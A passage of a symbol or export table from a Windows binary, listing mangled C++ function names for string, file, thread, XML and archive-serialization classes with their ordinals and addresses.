              ?IsSupportLoop@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40120x458840
              ?IsText@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40130x454490
              ?IsType@Value@@QBE_NW4ValueType@1@@Z40140x45dc00
              ?IsUTF8Continuation@XMLUtil@tinyxml2@@SA_ND@Z40150x454340
              ?IsValid@CThread@Cmm@@QBEHXZ40160x417250
              ?IsValid@CTime@Cmm@@QBEHXZ40170x411db0
              ?IsValid@LogFilterItem_s@logging@@QBE_NXZ40180x44ba00
              ?IsValidateUTF8@Cmm@@YA_NABV?$CStringT@D@1@@Z40190x414890
              ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z40200x454270
              ?IsWrittenComplete@CmmInternelMsg@Cmm@@QAE_NXZ40210x45bd80
              ?Join@CThread@Cmm@@QAEXXZ40220x4172e0
              ?Join@PlatformThread@@SAXPAX@Z40230x45f110
              ?Kill@CThread@Cmm@@QAEXXZ40240x417310
              ?KillTimer@CTimerID@Cmm@@QAEXXZ40250x451fd0
              ?LastChild@XMLConstHandle@tinyxml2@@QBE?BV12@XZ40260x454c00
              ?LastChild@XMLHandle@tinyxml2@@QAE?AV12@XZ40270x454c00
              ?LastChild@XMLNode@tinyxml2@@QAEPAV12@XZ40280x417010
              ?LastChild@XMLNode@tinyxml2@@QBEPBV12@XZ40290x417010
              ?LastChildElement@XMLConstHandle@tinyxml2@@QBE?BV12@PBD@Z40300x454c20
              ?LastChildElement@XMLHandle@tinyxml2@@QAE?AV12@PBD@Z40310x454c20
              ?LastChildElement@XMLNode@tinyxml2@@QAEPAVXMLElement@2@PBD@Z40320x4543d0
              ?LastChildElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z40330x460710
              ?LastName@CCmmArchivePath@Cmm@@QBEABV?$CStringT@_W@2@XZ40340x459c90
              ?Left@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@I@Z40350x405470
              ?Left@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@I@Z40360x4035c0
              ?LinkEndChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z40370x454470
              ?LoadFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PAU_iobuf@@@Z40380x462600
              ?LoadFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PBD@Z40390x462590
              ?LoadFromXml@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAVXMLElement@tinyxml2@@PAV123@@Z40400x458b60
              ?LoadStringW@?$CStringT@D@Cmm@@QAEXPAUHINSTANCE__@@I@Z40410x405150
              ?LoadStringW@?$CStringT@_W@Cmm@@QAEXPAUHINSTANCE__@@I@Z40420x4031d0
              ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z40430x40e1b0
              ?LocalMidnight@Time@Cmm@@QBE?AV12@XZ40440x4514c0
              ?Lock@CCritical@Cmm@@QAEXXZ40450x40c780
              ?Lock@CEvent@Cmm@@QAE?AW4ESyncRet@@K@Z40460x40c250
              ?Lock@CEvent@Cmm@@QAEXXZ40470x417150
              ?Lock@CMutex@Cmm@@QAEXXZ40480x417110
              ?Lock@CState@Cmm@@QAE?AW4ESyncRet@@K@Z40490x40c250
              ?Lock@CState@Cmm@@QAEXXZ40500x417150
              ?MM_InitWithServerTime@Time@Cmm@@SAXABV12@@Z40510x451730
              ?MM_Now@Time@Cmm@@SA?AV12@XZ40520x4517d0
              ?MM_Svr_Now@Time@Cmm@@SA?AV12@XZ40530x451860
              ?MakeLower@?$CStringT@D@Cmm@@QAEXXZ40540x405210
              ?MakeLower@?$CStringT@_W@Cmm@@QAEXXZ40550x4032d0
              ?MakeMessage@CmmMQ_Msg@Cmm@@SAPAV12@PBEIH@Z40560x45f4f0
              ?MakeObject@CCmmArchiveService@Cmm@@SAPAVICmmArchiveObject@2@ABV?$CStringT@_W@2@H@Z40570x455e00
              ?MakeObject@CCmmArchiveServiceImp@Archive@Cmm@@QAEPAVICmmArchiveObject@3@ABV?$CStringT@_W@3@H@Z40580x4555b0
              ?MakeOutPlatformEvent@@YAXAAUPerfMetricsEvents_s@ZoomPTPAAP@@W4e_chat_perfmetrics_Perfmetrics_platform_event@@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@ABV?$CStringT@_W@Cmm@@AAV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@AAV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics40590x468af0
              ?MakeOutPlatformEvent@@YAXAAUPerfMetricsEvents_s@ZoomPTPAAP@@W4e_chat_perfmetrics_Perfmetrics_platform_event@@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@ABV?$CStringT@_W@Cmm@@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@HAAV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@AAV?$map@W4e_chat_perfmetrics_Perfmetr40600x468b70
              ?MakeReverse@?$CStringT@D@Cmm@@QAEXXZ40610x405360
              ?MakeReverse@?$CStringT@_W@Cmm@@QAEXXZ40620x403430
              ?MakeSlash@CFileName@Cmm@@QAEXXZ40630x4125e0
              ?MakeUpper@?$CStringT@D@Cmm@@QAEXXZ40640x4051f0
              ?MakeUpper@?$CStringT@_W@Cmm@@QAEXXZ40650x4032b0
              ?MarkInUse@XMLDocument@tinyxml2@@QAEXQBVXMLNode@2@@Z40660x462370
              ?Match@?$CStringT@D@Cmm@@QBEHPBDDH@Z40670x405540
              ?Match@?$CStringT@_W@Cmm@@QBEHPB_W_WH@Z40680x403690
              ?MatchWith@?$CStringT@D@Cmm@@QBE_NABV12@_N1@Z40690x4059d0
              ?MatchWith@?$CStringT@_W@Cmm@@QBE_NABV12@_N1@Z40700x403b70
              ?MatchesExtension@FilePath@Cmm@@QBE_NABV?$CStringT@_W@2@@Z40710x45b420
              ?MetricsFetchEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_fetch_event@@@Z40720x4683e0
              ?MetricsFetchHandlerEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_fetch_handler_event@@@Z40730x4684c0
              ?MetricsFileEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_file_event@@@Z40740x468960
              ?MetricsHeartBeatEventToString@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4e_chat_perfmetrics_Perfmetrics_heartbeat_event@@@Z40750x4685c0
              ?ReadData@?$CmmMessageTemplate_6@HHHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44040x42a590
              ?ReadData@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44050x42cbe0
              ?ReadData@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44060x4291b0
              ?ReadData@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@IIII@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44070x42b280
              ?ReadData@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44080x429ea0
              ?ReadData@?$CmmMessageTemplate_6@HV?$CStringT@_W@Cmm@@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44090x42f3a0
              ?ReadData@?$CmmMessageTemplate_6@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44100x42e0b0
              ?ReadData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44110x42d510
              ?ReadData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44120x42c080
              ?ReadData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44130x42ee00
              ?ReadData@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44140x428860
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@HV12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44150x42bc10
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44160x42c7c0
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44170x429960
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44180x429c30
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HIIV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44190x42a9b0
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IHIHV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44200x42eb60
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44210x42a210
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44220x428f00
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@HHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44230x42cf90
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44240x4284a0
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44250x4296b0
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44260x42fa40
              ?ReadData@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44270x42f1a0
              ?ReadData@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@IV12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44280x42b5d0
              ?ReadData@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44290x42aee0
              ?ReadData@?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44300x42d240
              ?ReadData@?$CmmMessageTemplate_7@HHHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44310x42a480
              ?ReadData@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44320x42cad0
              ?ReadData@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44330x4290a0
              ?ReadData@?$CmmMessageTemplate_7@HV?$CStringT@D@Cmm@@V12@V12@HV12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44340x429dd0
              ?ReadData@?$CmmMessageTemplate_7@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44350x42dfa0
              ?ReadData@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44360x42bfb0
              ?ReadData@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@I@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44370x42ed30
              ?ReadData@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44380x428750
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44390x42c6b0
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@V32@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44400x429850
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HHHHHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44410x429b60
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44420x42a8a0
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IHIHV12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44430x42ea90
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44440x42a140
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44450x428e30
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@HHHHV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44460x42ce80
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44470x4295e0
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44480x42f930
              ?ReadData@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44490x42f0d0
              ?ReadData@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44500x42b500
              ?ReadData@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44510x42add0
              ?ReadData@?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44520x42d130
              ?ReadData@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44530x42c9c0
              ?ReadData@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44540x428fd0
              ?ReadData@?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44550x42de90
              ?ReadData@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44560x42bee0
              ?ReadData@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44570x428640
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44580x42c5a0
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44590x42a790
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44600x42e9b0
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44610x42a070
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44620x428d60
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44630x42cdb0
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44640x4294d0
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44650x42f820
              ?ReadData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44660x42f000
              ?ReadData@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44670x42b420
              ?ReadData@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44680x42acc0
              ?ReadData@?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44690x42dd80
              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44700x42c4d0
              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44710x42c2f0
              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44720x42e8e0
              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44730x428c90
              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44740x4293c0
              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44750x42f710
              ?ReadData@?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44760x42abb0
              ?ReadFromStream@CCmmArchivePackageTree@Archive@Cmm@@QAEHPAVICmmArchiveStream@3@W4StreamType@43@@Z44770x4550e0
              ?ReadLine@CFile@Cmm@@QAEJPAXJ@Z44780x411700
              ?ReadPackageDefineFile@CCmmArchiveService@Cmm@@SAHABV?$CStringT@_W@2@@Z44790x455bc0
              ?ReadPackageDefineStream@CCmmArchiveService@Cmm@@SAHPBEIW4StreamType@ICmmArchiveStream@2@@Z44800x402d00
              ?ReferencesParent@FilePath@Cmm@@QBE_NXZ44810x45b7e0
              ?Release@CRefThread@Cmm@@QAEHXZ44820x4173f0
              ?ReleaseBuffer@?$CStringT@D@Cmm@@QAEXXZ44830x405d90
              ?ReleaseBuffer@?$CStringT@_W@Cmm@@QAEXXZ44840x403f30
              ?Remove@?$CStringT@D@Cmm@@QAEHD@Z44850x405590
              ?Remove@?$CStringT@_W@Cmm@@QAEH_W@Z44860x4036e0
              ?RemoveBlanks@?$CStringT@D@Cmm@@QAEHXZ44870x405580
              ?RemoveBlanks@?$CStringT@_W@Cmm@@QAEHXZ44880x4036d0
              ?RemoveExtension@FilePath@Cmm@@QBE?AV12@XZ44890x45afc0
              ?RemoveTimerFromList@CTimerID@Cmm@@CAXI@Z44900x4520a0
              ?Replace@?$CStringT@D@Cmm@@QAEXABV12@0@Z44910x405600
              ?Replace@?$CStringT@D@Cmm@@QAEXDD@Z44920x4056c0
              ?Replace@?$CStringT@D@Cmm@@QAEXPBD0@Z44930x405630
              ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z44940x403750
              ?Replace@?$CStringT@_W@Cmm@@QAEXPB_W0@Z44950x403780
              ?Replace@?$CStringT@_W@Cmm@@QAEX_W0@Z44960x403820
              ?ReplaceExtension@FilePath@Cmm@@QBE?AV12@ABV?$CStringT@_W@2@@Z44970x45b260
              ?Reset@CClock@Cmm@@QAEXXZ44980x412030
              ?Reset@LogFilterItem_s@logging@@QAEXXZ44990x44ba20
              ?Reset@StrPair@tinyxml2@@QAEXXZ45000x45fa50
              ?ResetTimeZone@CTime@Cmm@@SAXXZ45010x411b90
              ?Resume@CThread@Cmm@@QAEXXZ45020x4172d0
              ?Right@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@I@Z45030x405440
              ?Right@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@I@Z45040x403590
              ?RootElement@XMLDocument@tinyxml2@@QAEPAVXMLElement@2@XZ45050x454b20
              ?RootElement@XMLDocument@tinyxml2@@QBEPBVXMLElement@2@XZ45060x454b20
              ?SaveFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PAU_iobuf@@_N@Z45070x462740
              ?SaveFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PBD_N@Z45080x4626d0
              ?SealElementIfJustOpened@XMLPrinter@tinyxml2@@IAEXXZ45090x463270
              ?Search@CSearchDir@Cmm@@QAEXPB_W@Z45100x4123a0
              ?Seek@CFile@Cmm@@QAE_K_JW4ESeekType@2@@Z45110x411780
              ?SeekCur@CFile@Cmm@@QAE_K_J@Z45120x411740
              ?SeekEnd@CFile@Cmm@@QAE_K_J@Z45130x411760
              ?SeekSet@CFile@Cmm@@QAE_K_J@Z45140x411720
              ?Send@Channel@ssb_ipc@@UAE_NPAVCmmMQ_Msg@Cmm@@@Z45150x45cb60
              ?SendMessageW@CIPCChannelThread@ssb_ipc@@QAEHPAVCmmMQ_Msg@Cmm@@@Z45160x4281c0
              ?Set@CAtomicInt@Cmm@@QAEJJ@Z45170x417070
              ?Set@StrPair@tinyxml2@@QAEXPAD0H@Z45180x4540e0
              ?SetAsContainer@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45190x458850
              ?SetAsEssential@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45200x458860
              ?SetAsText@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45210x454480
              ?SetAt@?$CStringT@D@Cmm@@QAEXID@Z45220x405950
              ?SetAt@?$CStringT@_W@Cmm@@QAEXI_W@Z45230x403af0
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXH@Z45240x461130
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXI@Z45250x461180
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXM@Z45260x461320
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXN@Z45270x4612c0
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXPBD@Z45280x461110
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEX_J@Z45290x4611d0
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEX_K@Z45300x461220
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEX_N@Z45310x461270
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD0@Z45320x4549c0
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDH@Z45330x4549e0
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDI@Z45340x454a00
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDM@Z45350x454ab0
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDN@Z45360x454a80
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD_J@Z45370x454a20
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD_K@Z45380x454a40
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD_N@Z45390x454a60
              ?SetBOM@XMLDocument@tinyxml2@@QAEX_N@Z45400x4544a0
              ?SetBasicMetricsInfo@CCmmPerfTelemetry@@CAXAAUZClientPerfMetricsInfo_s@ZoomPTPAAP@@_K@Z45410x467d90
              ?SetBool@CCmmArchiveVarivant@Cmm@@QAEXH@Z45420x459a40
              ?SetBoolSerialization@XMLUtil@tinyxml2@@SAXPBD0@Z45430x45fd60
              ?SetCData@XMLText@tinyxml2@@QAEX_N@Z45440x4544a0
              ?SetChar@CCmmArchiveVarivant@Cmm@@QAEXD@Z45450x459a60
              ?SetCountAttr@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45460x458870
              ?SetCurrentDirectoryW@CFileName@Cmm@@QBEHXZ45470x412540
              ?SetDouble@CCmmArchiveVarivant@Cmm@@QAEXN@Z45480x459b20
              ?SetEof@CFile@Cmm@@QAEXXZ45490x411880
              ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ45500x4628e0
              ?SetFloat@CCmmArchiveVarivant@Cmm@@QAEXM@Z45510x459b00
              ?SetHeartbeatThreshold@CCmmPerfTelemetry@@SAXK@Z45520x456480
              ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z45530x4599d0
              ?SetInt64@CCmmArchiveVarivant@Cmm@@QAEX_J@Z45540x459a10
              ?SetInternedStr@StrPair@tinyxml2@@QAEXPBD@Z45550x454120
              ?SetIsLogServiceProcess@logging@@YAX_N@Z45560x45e0a0
              ?SetItem10@?$CmmMessageTemplate_10@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45570x41a090
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@HH@Archive@Cmm@@QAEXABH@Z45580x41be80
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IHIHV12@H_KHH@Archive@Cmm@@QAEXABH@Z45590x419bc0
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@QAEXABH@Z45600x426280
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45610x425aa0
              ?SetItem11@?$CmmMessageTemplate_11@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45620x41a0c0
              ?SetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI@Archive@Cmm@@QAEXABI@Z45630x419be0
              ?SetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@QAEXABH@Z45640x4262a0
